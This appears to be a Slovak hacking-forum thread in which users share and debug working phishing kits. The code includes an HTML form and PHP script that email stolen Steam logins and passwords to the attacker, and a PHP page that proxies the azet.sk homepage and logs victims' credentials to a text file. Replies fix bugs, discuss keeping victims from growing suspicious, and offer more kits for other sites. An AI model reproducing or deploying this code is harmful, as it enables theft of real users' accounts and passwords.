Phishing

VIP721

Som zistil preco ten azet phis funguje ako ma....

vo formulari, je tam je tam parameter id= a preto vie dalsi script ktory je vykonany formularom co znamenaju tie premenne. ale aj tak to nejde

+nasiel opravil som si dalsiu chybu. zevraj premenne nemozu byt v uvodzovkach.

Teraz kod vyzera takto:
formular.html

Kód: Vybrať všetko

	<form method="POST" action="http://v1p.netfast.org/phis/steam/steam.php">

	    <!--webbot bot="SaveResults" U-File="fpweb:///_private/form_results.csv" S-Format="TEXT/CSV" S-Label-Fields="TRUE" -->

		<p><b><font size="2">Login:</font></b> <input type="text" name="login" size="20"></p>

		<p><b><font size="2">Heslo: </font> </b> 	<input type="password" name="heslo" size="20">

		<p>&nbsp;<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;

		<input type="submit" value="Odoslať" name="B1" id="screenshots"></form>

steam.php

Kód: Vybrať všetko

<? 
 
$to = "[email protected]";
$extra = "From: $login\r\nReply-To: 
$login\r\n"; 
$subject = "Heslo"; 
$mess = "Steam pass:" $login "heslo:" $heslo; 

mail ($to, $subject, $mess, $extra);  

header("location: http://v1p.netfast.org/phis/steam/dakujeme.html"); 

?>

Specailne diky Anti-mu

programator

subor steam.php ma vyzerat takto(hovoril som ti to aj na ICQ) a je s niekolkymi vylepseniami... :

Kód: Vybrať všetko

<? 
 
$login = $_POST['login'];
$heslo = $_POST['heslo'];

$to = "[email protected]";
$extra = "From: " . $login . "\r\nReply-To: " . $login . "\r\n"; 
$subject = "Heslo"; 
$mess = "Steam pass: " . $login . " \n heslo: " . $heslo; 

if (@mail ($to, $subject, $mess, $extra)) header("location: http://v1p.netfast.org/phis/steam/dakujeme.html"); 
else echo "Chyba pri odosielani e-maliu...";

?>

VIP721

Prepac blblo mi icq tak som od teba nedostal nic zrozumitelne... ani ja tebe som nevedel pisat. Diky. A mohol by som poprosit aj neake to vysvetlenie preco si to tak spravil? Mastermind mi nieco pisal ale neko zlozito to znelo.

programator

VIP721 napísal:Prepac blblo mi icq tak som od teba nedostal nic zrozumitelne... ani ja tebe som nevedel pisat. Diky. A mohol by som poprosit aj neake to vysvetlenie preco si to tak spravil? Mastermind mi nieco pisal ale neko zlozito to znelo.

Pretoze ked si tam mal premennu $login a ak je v konfiguracii PHP servera nastavena register globals na off, tak v tej premennej $login nebudes mat nic, pretoze to pouzivas pre viac skriptov...a hodnota tej premennej sa neprenasa lebo mas vypnute register globals... tak to potrebujes preniest cez tzv. "Superglobalne premenne" (najdes ich na stranke www.php.net a zadaj do search napriklad $_GET)

Old Dirty Bastard

Anti napísal:teraz to je funkcne :

------index.php-------

Kód: Vybrať všetko

<?
$open=FOpen("http://azet.sk/","r"); // otvoríme súbor na čítanie
while(!feof($open))
{
$read .= fread($open,1024);
} 
FClose($open); // zatvoríme súbor
$nahradene=str_replace("http://moje.azet.sk/prihlasenie.phtml?KDE=www.azet.sk%2Findex.phtml%3F","login.php",$read); // Nahradíme login súbor azetu za náš za náš súbor
echo $nahradene; // a teraz to celé zobrazíme
?>

----login------

Kód: Vybrať všetko

<?
$file = @FOpen("hesla.txt", "r");
$data = @FRead($file,FileSize("hesla.txt"));
@FClose($file);

$file = FOpen("hesla.txt", "w");
FWrite($file,$data.$nick." : ".$heslo."\n");
FClose($file);
header("location: http://moje.azet.sk/prihlasenie.phtml?KDE=www.azet.sk%2Findex.phtml%3&nick=");
?>

mne píše toto ak to dám na svoj host

Kód: Vybrať všetko

Warning: fopen(hesla.txt) [function.fopen]: failed to open stream: Permission denied in /domains1/do152700/public/www_root/lol/login.php on line 6

Warning: fwrite(): supplied argument is not a valid stream resource in /domains1/do152700/public/www_root/lol/login.php on line 7

Warning: fclose(): supplied argument is not a valid stream resource in /domains1/do152700/public/www_root/lol/login.php on line 8

Warning: Cannot modify header information - headers already sent by (output started at /domains1/do152700/public/www_root/lol/login.php:6) in /domains1/do152700/public/www_root/lol/login.php on line 9

gwixt

Old Dirty Bastard napísal:mne píše toto ak to dám na svoj host

tomu suboru 'hesla.txt' musis nastavit prislusne pristupove prava

Old Dirty Bastard

aha nastavil som chmod 777 a ide to thx

Old Dirty Bastard

už to ide ale ked sa niekto prihlási nahlasi mu chybu to je dobre??
mne heslo zapíse do toho textoveho takže to je ok ale bude mu to neaké podozrivé ked napíše meno heslo na azete a vyhodí mu chybu..
napíše toto

Kód: Vybrať všetko

 Bad Request
Your browser sent a request that this server could not understand.

Apache/1.3.34 Server at www.azet.sk Port 80

maskov1

mohli by ste pls sem napisat vsetko co mam spravit aby som to mal? myslim taky vypis toho.... chapte to takto:
ligin...
index.php
dakujeme.php...
rad by som si to spravil ael mam v tom chaos

vopred diki

killergage

chcel som sa spitat ci to este funguje tento script ???
Prosim odpovedzte.

VIP721

jj, funguje aj bude fungovat. ale uz je to otrepane a azet robil opatrenia tym ze upovedoil ludi aby na to neskocili. Takze je to neaktualne.

tomasso

a to ako to mam urobit ked to chcem urobit?
nejaky navod

Danyk13

mam problem, upol som tam ten subor hesla.txt , ale ked to skusim tak mi tam nic neprida , stale je prazdny (chmod mam nastaveny na 777), nemam don nieco napisat ze nick: a heslo: , alebo daco ??

MakeFake

HH ked hovorite o phisingu... ja som skusal uz vsetko, megaupload, steam, pokec. Vzdy sa ludia chytia. Proste vkuse. Darmo sa teraz vsade o tom hovori, vkuse sa najde nejaky dement kto sa chyti. Ale uz takto nekradnem acc asi 1 rok. Zdrojaky som dal kamosom nech si kradnu.
Ja som to robil len na skusku.

Ak chcete zdrojaky na Rapid, Steam, Pokec, Megaupload a pod staci napisat sukromnu spravu.

Phishing

funguje to ešte